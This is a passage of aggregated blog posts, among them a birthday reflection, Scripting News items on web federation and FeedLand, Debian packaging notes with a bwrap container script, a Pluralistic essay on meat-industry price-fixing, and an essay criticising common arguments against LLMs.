I’m fifty-seven today, and today is the first birthday that I can actually say that I can really feel I’m getting older. I have an arthritic knee now, which if I don’t take medication for will remind me that it’s arthritic; it’s also the first thing with my body (other than occasional seasonal allergies) that I habitually have to take a pill for. On the cosmetic level, the structure of my neck has begun to collapse, and while some of that has to do with the fact I’m carrying more weight around than I have before, I suspect that even when I get down to a more comfortable weight for me (this is on the “to do” list for my fifty-seventh year), the lack of structure will still be there. My already very thin hair up top has become even thinner. I have started wearing cardigans.

On the other hand, my career is going great, my family is terrific, and I’m married to the best human I know. I see friends often, I travel all over the place to see people who are happy I’ve come to where they are, and I get to do with my life pretty much what I’ve ever wanted to do. Is that all worth the arthritic knee and the collapsing neck structure? Well, here’s the thing: At this point in the game, the arthritic knee and collapsing neck structure would be happening anyway, regardless of the circumstances of my life. On balance, I have very little to complain about on this, my fifty-seventh birthday, and much to be happy for and grateful about.

So that’s what I’m going to focus on. It’s a good day where I am, and I hope it’s a good day where you are, too. Happy my birthday to you! And many more!

— JS

15:28

Routing around the algorithms [Scripting News]

AOC in an interview nailed everything in one brief answer to a question from the audience. You can watch it here.

It was so good and quotable that I recorded it and created a transcript via Google and Claude.

I've been emailing with Josh Marshall at TPM for the last few weeks, saying that we can't just keep building on what the tech industy has given us as a news distribution system. AOC touches on this in her answer -- she says the tech people control the algorithms, and they do. But the web doesn't have algorithms, and we have enough standards available to create a very good network that isn't owned by anyone.

I was at one time motivated by money, the same way politicians are motivated to attain higher office, but I had an impulsive idea when the web popped up that I am not doing it for money anymore. I'm doing it so we can change our political and work communication so it gives power to the people, not to the tech industry. At that time we were already dealing with the excesses of tech, I knew it well because I was an an insider.

They are welcome to make products for it, but they can't control the users. That's what I envisioned in the 90s and 00s. The ads won't be as important as what people say, because the price of using the web is very low. But we got snookered anyway. The VCs were only motivated by money, and to maximize that, they needed maximum control, and they got it. People like being part of big things, and Twitter was and still is big.

We're now at the next turning point. AI is creating new pathways for ideas to flow. It's all wide open right now, more open than it's been in over 20 years. Right now we could put a twitter-like product there that you can set up in a few minutes, run it yourself, and or join one that's run by a friend. And they federate immediately. All based on the open standards of the web. Every component replaceable. No big central thing to be owned.

But Josh, we can't do it without your help. AOC doesn't know us. She probably doesn't think how the web could route around the algorithms. But she, and you should be thinking about that, and Heather Cox Richardson too, because we can create the people's tool for the change she wants, which is the change I want, and you want too (I read your columns). But we have to work together to make it happen.

BTW, all politicians should swear by what she says. And we should never care about polls. We should only care about results.

Transcript of AOC's answer

I recorded the interview, Claude did a light edit of the transcript. I highlighted the part about the algorithms.

You know, it's funny, because, in this op-ed that Jeff Bezos paid for in the Washington Post, there was this line where you had mentioned earlier about me as a potential 2028 contender, and in the context of that, it was very clear this was a veiled threat, right?

So the elite think: if you want this job, you just stepped out of line. And we want you to know where the real power is. And it's in the modern-day barons who own the Post and own the algorithms. And we're gonna— we'll make an example out of you.

And what's funny about that is that they assume that my ambition is positional. They assume that my ambition is a title or a seat. But my ambition is way bigger than that. My ambition is to change this country.

Presidents come and go. Senate and house seat elected officials come and go. But single-payer healthcare's forever. In many ways, it's forever work, right? Forever work is what we should follow, and so anyways, I— the way— but to put a finer point on your question, is that when you aren't attached, right? When you haven't been, like, fantasizing about being this or that since the time you're seven years old, it's a tremendously liberating thing. Because I get to wake up every day and say, how am I going to meet the moment? And conditions change radically all the time. So, I make my response— less out of an attachment to a positional, like, you know, title or position and working backwards from there— but I make decisions by waking up in the morning, looking out the window and observing the conditions of this country and saying, what move or what decision can I make today that's going to get us closer to that future— stronger, faster, better than yesterday?

10:21

Empathy is difficult [Seth's Blog]

It requires skill and effort. It can be taught. And it’s worth prioritizing.

When we wing it, allocate little time to it or assume it’s a side effect of our work, we diminish the effort and blur our focus.

“I wonder what it’s like to be you” is part of what makes us human, but we’re rarely as focused on this work as we could be.

Simply announcing how hard it is is a fine place to begin.

10:07

Steinar H. Gunderson: MySQL hypergraph optimizer [Planet Debian]

MySQL released (well, flipped the default compilation flag for) the hypergraph join optimizer in the community builds; this was the main project I started and worked on while I was there, so it's nice to see even though it's been default in e.g. their cloud column store for a long time. You can read their blog post (though beware, likely-LLM text ahead).

(The cost model improvements and TPC-DS benchmarking are from after my time.)

00:00

Dirk Eddelbuettel: RcppSpdlog 0.0.29 on CRAN: Small Enhancement [Planet Debian]

Version 0.0.29 of RcppSpdlog arrived on CRAN today, has been uploaded to Debian and built for r2u. The (nice) documentation site has been refreshed too. RcppSpdlog bundles spdlog, a wonderful header-only C++ logging library with all the bells and whistles you would want that was written by Gabi Melman, and also includes fmt by Victor Zverovich. You can learn more at the nice package documention site.

This release features a rewritten internal routine unpacking the R variadic arguments into C++ variadic template arguments. This in turn allows to turn back to std::format in C++ mode when C++20 is used. We also adjust for the not-quite-ready-for-this state of the x86-64 based macOS machine at CRAN. It is running a compiler and SDK choice that cannot fully deal with C++20, so we dial compilation on it down to C++17. Similarly, and as we found out after the release, Ubuntu jammy is also too old to default to std::format so we need to add a better detection here too so that we can also fall back to the included fmt there.

The NEWS entry for this release follows.

Changes in RcppSpdlog version 0.0.29 (2026-05-08)

  • Some small continuous integration updates

  • The internal formatter was rewritten as a recursive generator of variadic templates.

  • Switch back to std::format with C++20, but force inferior macos-release-x86_64 to use C++17 rather than default C++20 which fails

Courtesy of my CRANberries, there is also a diffstat report detailing changes. More detailed information is on the RcppSpdlog page, or the package documention site.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

Saturday, 09 May

20:07

Jelmer Vernooij: Remove-after Annotations for Debian Files [Planet Debian]

deb-scrub-obsolete is a tool in the debian-codemods suite that tries to identify and remove cruft automatically. It knows about dummy transitional packages, superseded alternatives, and similar patterns it can detect by querying the archive. But some workarounds are too project-specific for a generic tool to recognise on its own.

Developers can leave structured comments in their packaging files that tell deb-scrub-obsolete when a particular line or block can be removed.

The Debian Janitor regularly runs various codemods like deb-scrub-obsolete on all vcs-accessible Debian packages. This means that if you leave a “remove-after: trixie” annotation in your package, you will automatically get a pull request to remove the annotated code once trixie has been released, without needing to remember to do it yourself.

The Comment Format

The annotations take the form of specially-formatted comments. For shell files (and by extension most maintainer scripts), a line-level annotation looks like this:

install -m 755 compat-wrapper /usr/lib/foo/  # remove-after: trixie

When trixie has been released, deb-scrub-obsolete will remove that line entirely. The comment can appear anywhere on the line — before or after other comments — and additional explanatory text can follow:

blah  # Trixie comes with blah built in # remove-after: trixie

For larger sections, block-level annotations bracket the code to remove:

# begin-remove-after: trixie
alternatives --add foo bar
alternatives --add foo bar1
# end-remove-after

These blocks can be nested, which is useful when one outer condition wraps several inner ones with finer-grained timing.

Expressions

The initial set of supported expressions is deliberately small. The main one is a Debian release name: remove-after: trixie means “once trixie has been released”. The condition is checked against distro-info <https://manpages.debian.org/trixie/distro-info/distro-info.1.en.html>_, the same data source that other Debian tooling uses to track release status.

The expression language is designed to be monotonic — conditions should only ever go from false to true, not back. A workaround that needs to be re-introduced after removal belongs in a new commit, not in an annotation. If deb-scrub-obsolete cannot parse an annotation it finds in a file, it leaves all annotations in that file untouched, to avoid a situation where related blocks are only partially removed.

Annotations can also carry a marker name — an arbitrary label with no spaces, commas, or the word “after” — which can then be passed to deb-scrub-obsolete on the command line. This makes it possible to trigger removal of a named set of annotations together, useful for coordinated transitions where several packages need to be cleaned up at the same time.

Future Extensions

The initial expression set is minimal; the design leaves room for richer conditions. Some candidates under consideration:

  • Whether a particular suite has a new enough version of a package (removing a Build-Depends version constraint once it is satisfied everywhere)
  • Whether a package has been removed from the archive
  • Whether all currently-supported releases contain a new enough version
  • Whether a Debian transition has completed

Compound expressions using “and” / “or” are also on the list, for cases where removal depends on multiple conditions being true simultaneously.

Status

The annotation format is specified but not yet implemented in deb-scrub-obsolete - it is planned for a future release. If you maintain Debian packages and have opinions on the annotation format or the expression language, feedback is welcome. The specification lives in scrub-obsolete/doc/scrub-annotations.md in the lintian-brush repository. Many thanks to Helmut Grohne for the initial suggestion and feedback on the design.

16:00

Web to Mastodon makes sense [Scripting News]

A post from Scripting News, automatically mirrored to a WordPress site, and that flowed via ActivityPub to Mastodon, via a relatively new feature in WordPress. Almost by accident Mastodon supports long text, styling and links -- even though their editor doesn't generate it, if it comes from the outside it will respect the styling.

Below is a post on Mastodon coming from WordPress. Masto's limits aren't enforced, and that's good.

15:14

The value of having a good bench [Scripting News]

The Knicks continue to astound. Last night, they went up 3-0 against the Sixers in Philadelphia. Game 4 is tomorrow at 3:30PM Eastern.

Last night's game was a fantastic contrast with the way the Knicks played in the post-season last year. They had the same starting lineup then, but a different coach, one who rarely put in the bench players unless he had to because of injury. As a result our starters were always playing exhausted, and it got worse as they got deeper into the post-season, until finally in the conference finals against Indiana they had no more gas and were eliminated. This year's Knicks with a deep bench of fantastic players, who the new coach rotates in, makes all the difference. Why? Because the players on the court for the Knicks aren't particularly tired, and if they are, they can get a rest,.

So in the first period the Sixers came out with fury, and they won the first quarter, because both teams were fresh, and maybe the Knicks were onto their problem, and didn't fight too hard to win the first knowing they'd have the big advantage in the second, third and fourth, where the Sixers players legs would be getting wobbly and they were thinking too much about the shots they were taking.

Also worth noting we have a grudge against the Philadelphia team, esp their overwhelmed and dirty-playing big man, Embiid.

The Knicks have a fantastic core team, veterans in their prime, and have been with each other for some since college. They have added to the team incredibly well. Every player coming off the bench has a special power, and it all works.

What's the limit? Unlike many fans I'm not in the expectations business. I'm happy to see how well they're playing now, and am prepared for whatever lessons come our way in the rest of the playoffs.

Performance work on FeedLand [Scripting News]

Just spent a couple of days working with FeedLand in Claude Code. I want to do some work on features, but first, we're looking at performance issues. There had been a longtime problem with categories that didn't have many feeds that were viewed through the news pages. Examples, the podcasts category, or the NYT category.

You can test it yourself. I was using the categories in news page on feedland.org for the test.

When I checked, on feedland.org all my categories on the news page displayed slowly except for All, which we had put an optimization in for in October 2025. So I worked with Claude on this yesterday, did a set of tests, and realized that the optimization we did last year, made categories with very few feeds much slower. So we put in an exception, installed the new software on feedland.org and I'm happy to report that all my tabs are fast now.

Now all the tabs are fast enough. I'd always like them to be faster, but all load in less than 2 seconds, most in less than 1.

The new version is not installed on feedland.com or feedland.social yet.

14:28

Pluralistic: Trump's fruitless search for a goreable ox (09 May 2026) [Pluralistic: Daily links from Cory Doctorow]

->->->->->->->->->->->->->->->->->->->->->->->->->->->->-> Top Sources: None -->

Today's links



Two men in suits seated next to each other. The younger man is pointing at a brochure. The younger man's head has been replaced with a whole roast chicken. The older man's head has been replaced with a large beef roast. The brochure has been replaced with vintage meat ads. The background is a cropped section of of a high-magnification scan of a US $100 bill, colors faded and shifted.

Trump's fruitless search for a goreable ox (permalink)

I've got good news and bad news for Trump. The good news: you can get elected by promising to do something about the cost of living crisis, and the president actually has a lot of ways to improve people's daily costs. The bad news: everything you could do to fix working people's cost of living will make an oligarch worse off.

This is the essential conundrum of Trumpismo: to keep his base happy, he needs to make their lives better; but to make their lives better, he'll have to make oligarchs angry. The oligarchs' wealth bonanza caused the cost of living crisis. Oligarchs' pleasure causes our suffering, so alleviating our suffering will reduce their pleasure.

This means that while Trump can promise help with prices, all he can deliver is union-busting, ICE lynchings, and pointless wars, none of which have any hope of materially improving the lives of working people. Indeed, all of this stuff makes working people materially worse off, as wages fall, crops rot in the fields, and gas prices shoot through the roof.

Trump would dearly love to find an ox he can safely gore, but all the good oxen are owned by his oligarch chums. Trump can't punish Ticketmaster, because the billions Ticketmaster steals from the WWE, F1 and football fans in his base all land in the pocket of oligarchs who own stock in Ticketmaster, and Trump can't afford to upset those oligarchs:

https://pluralistic.net/2024/06/03/aoi-aoi-oh/#concentrated-gains-vast-diffused-losses

Indeed, I can't think of a single corrupt racket that Trump can afford to do something about. Not even the only cost of living metric that can approach gas prices in the hierarchy of American electoral salience: grocery prices.

Your grocery bill went up because oligarchs price-gouge you. Eggflation was caused by Cal-Maine, the monopolist that owns every brand of eggs in your grocer's fridge, who jacked up prices because they knew they could:

https://pluralistic.net/2025/03/10/demand-and-supply/#keep-cal-maine-and-carry-on

Pepsi and Walmart conspired to force every retailer to jack up the prices of all Pepsi products (including Frito-Lay, Gatorade, Aquafina, etc) at every retailer's store, so that Walmart could also jack up their prices and still undersell their competition (naturally, Trump let them get away with it):

https://www.thebignewsletter.com/p/secret-documents-show-pepsi-and-walmart

This stuff isn't exactly a secret. Grocery store owners hold earnings calls with their investors where they boast about the fact that they can raise their prices far in excess of their increased costs, and blame it on inflation:

https://pluralistic.net/2023/03/11/price-over-volume/#pepsi-pricing-power

They boast about their "personalized pricing" swindles, whereby they use surveillance data to figure out how desperate you are and jack up the prices you see in their apps:

https://pluralistic.net/2025/12/11/nothing-personal/#instacartography

Trump has the power to put a stop to all of this, but still, he can't, because his oligarch pals would squeal, and when they squeal, Trump jumps. In theory, Trump has lots of power, but in practice, Trump can't do anything.

Which brings me to the cost of meat. Meat inflation has raced ahead of other forms of food inflation, even as the payments to ranchers and other producers fell sharply, leading to waves of bankruptcies:

https://www.thebignewsletter.com/p/beef-is-expensive-so-why-are-cattle

Partly, that's because meat processing is controlled by cartels, with 85% of all the beef being processed by four packers, and nearly every chicken going through one of four poultry processors. These middlemen jack up prices to grocers while colluding to push down the payments to their suppliers.

How do they rig those prices? After all, it's very illegal for these four companies to get together around a table to rig prices. Instead, they use a "price consultancy" called Agri Stats that does the price-rigging for them. Every week, the packers send a detailed list of all their costs and prices into Agri Stats, and Agri Stats "advises" them all to raise all their prices at once, and anyone who doesn't play along is pushed out of the Agri Stats cartel. Everyone wins – except families paying for groceries:

https://pluralistic.net/2023/10/04/dont-let-your-meat-loaf/#meaty-beaty-big-and-bouncy

Agri Stats has been doing this since the Reagan years, but they grew steadily more brazen, until, back in 2023, Biden's DOJ brought history's most obvious, easily won antitrust case against them:

https://www.meatpoultry.com/articles/29124-doj-sues-agri-stats-for-complicity-in-meat-market-manipulation

And wouldn't you know it, Trump just settled that case, in a way that will make Agri Stats much, much richer and give them far more opportunities to rig prices:

https://prospect.org/2026/05/08/meat-industry-agri-stats-department-of-justice-price-fix-trump/

Under the terms of the settlement, Agri Stats must "allow" restaurants, farmers, and other parts of the supply chain to pay it for the data it consolidates. This will allow more parties to collude to rig prices, and provide more income to Agri Stats. As David Dayen writes in The American Prospect, they've been "sentenced to make money."

Agri Stats isn't the only "price consultancy" that is used to launder a price-fixing cartel that's driving up the cost of living for all Americans, including Trump's base, in order to make oligarchs better off. Companies like Realpage do the same thing for residential rents:

https://pluralistic.net/2024/12/11/nimby-yimby-fimby/#home-team-advantage

Trump can't do anything about any of these scams, not without goring some oligarch's precious ox. But, as Dayen points out, there are dozens of Democratic state Attorneys General who can kill Trump's sweetheart deal for Agri Stats using the Tunney Act, which gives them standing to sue to force a federal judge to review the settlement and determine whether it is fair.

Whether any AG will seize the moment remains to be seen, of course, but it would be very good politics to do so – after all, the path to political power in America runs through credible promises to do something about the cost of living crisis.


Hey look at this (permalink)

'The Biggest Student Data Privacy Disaster in History': Canvas Hack Shows the Danger of Centralized EdTech https://www.404media.co/the-biggest-student-data-privacy-disaster-in-history-canvas-hack-shows-the-danger-of-centralized-edtech/



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago A dotcom founder's tale (funny) https://features.slashdot.org/story/01/05/04/1541239/the-worst-of-times

#20yrsago Shell UK abandons chip-and-pin after £1M fraud https://web.archive.org/web/20060508044110/https://www.snakeoillabs.com/2006/05/07/shell-stops-accepting-chip-and-pin-in-fraud-fiasco-bp-to-follow/

#15yrsago Typewriter bust: Grandfather https://web.archive.org/web/20110511033756/http://jemayer.tumblr.com/post/5260317696

#10yrsago Kobo “upgrade” deprives readers of hundreds of DRM-locked ebooks https://www.teleread.com/drm-nightmare-after-recent-upgrade-kobo-customers-report-losing-sony-books-from-their-libraries/

#10yrsago Venerable hacker zine Phrack publishes its first issue in four years https://phrack.org/issues/69/1

#10yrsago Panama Papers whistleblower issues statement, naming and shaming failed states and institutions https://web.archive.org/web/20160506180902/https://panamapapers.icij.org/20160506-john-doe-statement.html

#5yrsago The FTC's (kick-ass) Right to Repair report https://pluralistic.net/2021/05/07/pro-act-class-war/#we-fixit

#5yrsago The PRO Act and worker misclassification https://pluralistic.net/2021/05/07/pro-act-class-war/#sectoral-balances

#1yrago Mark Zuckerberg announces mind-control ray (again) https://pluralistic.net/2025/05/07/rah-rah-rasputin/#credulous-dolts


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Stahle covers..

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification, Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), Firstsecond, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus, Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

13:56

Russell Coker: Packaging Amazfish for Debian [Planet Debian]

I have done some packaging work on Amazfish (the smart-watch software that works with the PineTime among others) for Debian. Here is my Git repository for libnemodbus (a dependency for Amazfish that isn’t in Debian) [1]. Here is my Git repository for Amazfish itself [2].

These packages are currently using QT5 which is a good reason to not upload them now as the transition to QT6 is in progress. Patching them to work with QT6 (as the libnemodbus upstream is apparently not migrating to QT6 yet) shouldn’t be that difficult but is something that needs some care and communication to get it right.

Running this package on my laptop with my PineTime (which worked very reliably when run by GadgetBridge on Android) wasn’t reliable and the PineTime would disconnect and refuse to connect again. Doing it on the Furilabs FLX1s gave a similar result. If Amazfish was the only Bluetooth program having problems on my laptop and on my FLX1s then I’d blame it, but both those systems have some other Bluetooth issues.

Running this on my laptop Amazfish would send it’s own test notifications to my watch but system notifications (from notify-send among others) wouldn’t get sent. Running this on my FLX1s I got ONE notification from my network monitoring system sent to my watch before my phone and watch stopped talking to each other.

To make things even more difficult for me the harbour-amazfish-ui program doesn’t work correctly with the libraries installed on my FLX1s and doesn’t display the content of many screens but it works correctly when running in a container environment with stock Debian/Testing.

Below is the script that I’m currently using to launch apps in a Debian/Testing container on my FLX1s. The comment about unshare-user doesn’t apply to this version of the script but I left it in to avoid the potential for future confusion. The Furilabs people diverted the bwrap binary and have a wrapper that removes a set of parameters that they think will cause problems.

#!/bin/bash
set -e

BUILDBASE=/chroot/testing

# bwrap: Can't mount proc on /newroot/proc: Device or resource busy
# get the above with --unshare-user and --unshare-pid
exec bwrap.real --bind /tmp /tmp --bind /run /run --bind $HOME $HOME --ro-bind $BUILDBASE/etc /etc --ro-bind $BUILDBASE/usr /usr --ro-bind $BUILDBASE/var/lib /var/lib --symlink usr/bin /bin --symlink usr/sbin /sbin --symlink usr/lib /lib --proc /proc --dev-bind /dev /dev --die-with-parent --new-session "$@"

Due to the range of problems I’m having I think it would be best to pass this package on to someone else who has a different test setup. It could be that further testing will reveal that my issues are related to bugs in Amazfish but I can’t prove it either way at this time. Maybe when using a smart watch other than a Pine Time it will work more reliably but it seems most likely that my laptop and phone are to blame. I can’t make more progress on this now.

12:21

Russell Coker: Bad Criticism of LLMs (not AI) [Planet Debian]

Discussion of “AI” systems seems to be dominated by fears of uncommon and unlikely threats. I think that we should be focusing more on real issues with LLMs and with society in general and put the most effort towards the biggest problems.

It’s Not AI

True Artificial Intelligence [1] (IE a computer that has the mental capacity of a household pet) is something that I think can be developed, but it hasn’t been developed and we don’t have good plans for developing it. We seem to be a lot further away from achieving that goal than we were from landing on the moon in 1962 when JFK gave his historic speech.

What we have is a variety of pattern recognition systems that can predict what fits into a pattern. The most well known type of Machine Learning (ML) is the Large Language Model (LLM) which means ChatGPT and similar systems which predict which text would be likely to come next and can make an essay from it. They can give interesting and useful output, but there is no thought behind it, it’s just a better form of Eliza (the famous program from 1964 that simulates conversation by pattern matching) [2]. By analysing billions of documents, storing the data in a condensed mathematical way, and then using computation to extract from that record LLMs can produce output that is unfortunately considered by some people to be good enough to include in legal documents submitted to courts, university assignments, and many other documents. But they do so without even having the thinking ability of a mouse.

To call current systems “AIs” without any significant qualifiers when criticising them is to concede the debate about the worth of such things.

If we develop AIs that can actually think we will have to deal with the issues in the SciFi horror short story Lena by qntm [3].

The Bad Arguments

Here is a list of some of the most unreasonable arguments I’ve seen against “AI” which distract attention from real problems both related to “AI” and other problems in society.

Suicide and Homicide

Wikipedia has a page listing Deaths Linked to Chatbots [4] which right now has 16 entries from 2023 to Feb 2026. They are all tragedies and as a society we should try to prevent such things. But what I would like to see from the media is some analysis of overall trends, yes it gets people’s attention when someone dies in an unusual way but we need to have attention paid to the more numerous deaths which are preventable. It has become a standard practice to give information on Lifeline in media referencing suicide, it would be good if they also developed a practice of mentioning the relative incidence of a problem when publishing an article about it.

One of the many factors that cause more suicides than chatbots is school, Scientific American has an informative article from 2022 about the correlation between child suicide and school [5]. It is based on US statistics and shows that the lowest suicide rate is in July (a no-school month in the US) which has a rate of 2.3 per 100,000 person years. So if kids had a quality of life equivalent to July all year around then there would be 2.3 suicides per 100,000 kids every year while if they had a quality of life equivalent to a Monday in January or November it would be 3.9 suicides per 100,000 kids every year. The article states “Any time I present these data to teachers, parents, principals or school administrators, they are shocked. This should be common knowledge.” It is common knowledge to anyone who takes any notice of what happens in schools, but paying attention to serious problems is unpleasant, it’s more fun to pretend that school is good for everyone. No parent wants to think that they sent their child to a place that was horrible, no teacher wants to think that they are part of a system that harms kids.

The US CDC has an informative article about youth suicide [6] which documents it as the 3rd largest cause of death in the 14-18 age range fro 2021. This article was published in 2024 and based on statistics from 2023 and earlier. It notes significant differences in suicides, attempts, and “persistent feelings of sadness or hopelessness” which had girls at more than twice the rate of boys and “LGBQ+” kids at more than twice the rate of “heterosexual” students. It seems obvious that misogyny and homophobia is correlated with suicide and that’s something that could and should be addressed in schools. My state has a Safer Schools program [7] to try and alleviate the problems related to homophobia, but I expect that things are getting worse in the US in that regard. 39.7% of kids in US high schools had “persistent feelings of sadness or hopelessness” before LLMs became popular, school could and should be a happy time for the vast majority of kids but instead almost half of the kids don’t enjoy it and a majority of girls and “LGBQ+” kids don’t. Having no mention of trans kids is a significant omission from that article, based on everything I’ve heard from trans people I expect that their statistics would be even worse.

One could argue that the small number of deaths inspired by use or misuse of LLMs is an indication of a larger number of people suffering in ways that don’t result in death and don’t get noticed. But I don’t think that can compare to the fact that the majority of girls and “LGBQ+” kids have “persistent feelings of sadness or hopelessness” in the current school system.

Regarding homicide, the Australian Institute of Criminology has an article showing that in the 2003-2004 time period 49% of women who were killed were listed as a “domestic argument” [8], that’s something that could and should be addressed. That article claimed 308 homicide victims in that time period which is larger than the world-wide death toll from LLMs but also less than 1/3 the death toll from car accidents in Australia. Australia has less than 0.4% of the world population, a fairly low homicide rate, and a number of homicides that vastly outnumbers all world homicides related to LLMs.

I think it’s great to address any cause of suicide or homicide, but devoting government resources and legislation towards very uncommon causes instead of things that happen every day is not a good strategy. It would be fine to address all factors leading to suicide, but problems with the school system have been a major factor for decades with little effort applied to fix it.

Fraud and Other Crime

There is evidence of criminals using LLMs to help prepare for crimes, the ability to generate large amounts of text quickly can be used for fraud and extortion. This is going to be a serious problem and we need structural changes to society to deal with it. There is an ongoing issue of scammers convincing older people that their child or other young relative is in trouble and a large amount of cash is required to address it. This sort of scam as well as the more well known “Nigerian” scams will probably become more common as the cost of running them decreases. This may be more of a problem for people in developing countries as currently a common scam business model is to have people in regions where wages are low (such as Pakistan for one who I spoke to) scamming people in relatively wealthy countries like Australia so an attack with a low probability of success is financially viable. Cheaper attacks will make less affluent victims financially viable to the scammers.

While writing this post I received a financial scam phone call trying to get me to invest in SpaceX that was run by an “AI” chat system, I expect to receive more of them and this is something that needs to be dealt with via both technical measures and legislation.

Do we have to accept less freedom and less anonymity in finances as a cost of reducing financial crime? Greater restrictions on the use of cash would make some crimes more difficult or less profitable for criminals. As a society I think we need to have a discussion about a balance between financial freedom and freedom from criminal exploitation, failing to have such a discussion is likely to lead to policies which don’t work well.

Also one thing that ML systems are good at is recognising patterns in data. Banks could scan all their transactions and look for patterns that correlate with fraud. They currently do this badly and do things like locking credit cards when someone goes to another country and spends money. They could do a better job of that and involve the police in cases of obvious fraud even when the customer doesn’t realise that they are a victim.

This isn’t a reason to criticise “AIs”, it’s a reason to plan defensive technology that matches the capabilities of attackers.

As an aside I used to work for a company that was developing “AI” software to scan bank phone calls and allow banks to recognise employees who acted illegally. Unfortunately the Royal Commission into banking misconduct [9] didn’t impose any penalties that gave the banks a financial reason to avoid criminal activity.

Unemployment and Inequality

There are many claims about AI systems making large numbers of jobs obsolete, some of them are outlandish such as the claims that all white-collar jobs will be obsolete in the near future. There are some reasonable claims like the ability to replace some mundane jobs.

Replacing jobs that suck with computers, robots, and other machinery is a good thing! Very few people wish that they were working on a farm without a tractor. In 1900 it’s estimated that between 60% and 70% of the world labour force worked in agriculture and 40% of the US labour force did so. Now it’s something like 27% globally and between 1% and 3% in developed countries. Automated factories are also a good thing, it’s best to avoid boring and dangerous work.

The most plausible claims about job replacement from “AI” is jobs that involve analysing and summarising documents. One example that comes to mind is the worst kind of journalism where press releases from companies are massaged into the format of a feature article. I don’t think anyone wants that sort of job and doing it with “AI” hopefully means no human has to sign their name to it.

For work like programming few people will be directly replaced by “AI” but if people can do their work more efficiently while using it then less people are required. I don’t think that any programmer likes the part of their job where they have to skim read long documents looking for a clue about how to solve a problem with a library or protocol. A LLM processing the document and finding the potentially useful things will take away the drudgery from the work and allow greater productivity.

The trend in replacing people has been making people work longer. If you force all employees to work 60 hour weeks then that can theoretically allow hiring fewer people than having 40 hour weeks. For some work that applies but for skilled work it mostly doesn’t as productivity and work quality on average drops when people work more than 40 hours in a week.

Another trend for exploiting people is having a low minimum wage and making accommodation expensive so that many people need to work two jobs. What we need is legislation to restore the situation in the 70s where a single full time job was sufficient to provide for a family. The low minimum wage and high expenses for many things is a problem that’s been slowly developing over the course of decades while being mostly ignored by journalists. If they could concentrate on the real issues that are hurting workers today they could incite political action to fix these problems.

Academic Cheating

There is no shortage of ways of cheating in school and university. There are people who are paid to write essays, mobile phones are used for cheating in exams, etc. Getting an “AI” to write essays makes it easier to cheat for the essay writing part but does so with lower quality and in a less stealthy way.

What’s the worst case scenario? That we have to change to oral exams for all university subjects?

In the US the average annual price for tuition at a university is apparently $25,000, if each student had individually supervised assessment for their exams at a cost of $100 per hour it would make the degree cost 4% more. The cost of university in the US is unreasonably high and that’s a problem that needs to be fixed, but a hypothetical case of increasing the price by 4% isn’t going to be a major part of it.

Weak Arguments Against “AI”

Computer Security Attacks

There have been many claims made that “AI” will break the security of all systems and cause the type of disruption that was previously predicted for year 2000. Bruce Schneier has written a good analysis of the issues including how “AI” can be used by both attackers and defenders [10], he doesn’t have a strong conclusion on whether the net result will be good or bad but his article does make it clear that the result is not going to be a total disaster.

While I was working on this post I read another post by Bruce Schneier that was significantly more negative about this issue [11]. While I still don’t think this will destroy civilisation I found his other post convincing enough to move computer security from the bad argument section to the weak argument section.

Spidering the Web to Death

There are issues of bots from “AI” companies doing a bad job of trying to download all the Internet’s content and using a lot of resources. When it was just the major search engines and the Wayback Machine doing it the load was small due to having a small number of organisations that were very good at the way they did it having evolved practices over many years. Now we have a lot of idiots doing it badly and repeatedly hitting generated content.

This is really annoying but is something that we can deal with. Currently my blog and many other sites are hosted on a Hetzner server with a E3-1271 v3 CPU with 32G of RAM and there are occasions where more than half the CPU power is being used to service web requests from such systems. Even on the “server bidding” (renting servers previously used by other customers) Hetzner isn’t offering systems so slow nowadays, the slowest they offer is about 20% faster than that. This is something that can be dealt with by spending a little more on hosting until the companies doing that go bankrupt.

